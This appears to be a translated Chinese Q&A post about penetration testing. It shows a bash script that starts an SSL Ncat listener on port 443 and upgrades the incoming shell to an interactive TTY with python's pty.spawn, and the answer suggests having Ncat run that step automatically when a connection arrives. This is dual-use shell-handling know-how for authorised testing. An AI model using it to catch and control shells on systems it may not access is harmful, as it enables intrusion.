我有下面的bash脚本,我试图在建立连接后让后续的python命令在Ncat shell中运行。有没有办法做到这一点?
#!/bin/bash
ncat -vnl 443 --ssl
python -c 'import pty;pty.spawn("/bin/bash")'
答案 0 :(得分:0)
我提出的解决方案是在建立连接而不是/ bin / bash时让Ncat在渗透测试框上运行包含python命令的bash脚本。这样,服务器上只需要监听器,我们就可以获得完全交互式的shell。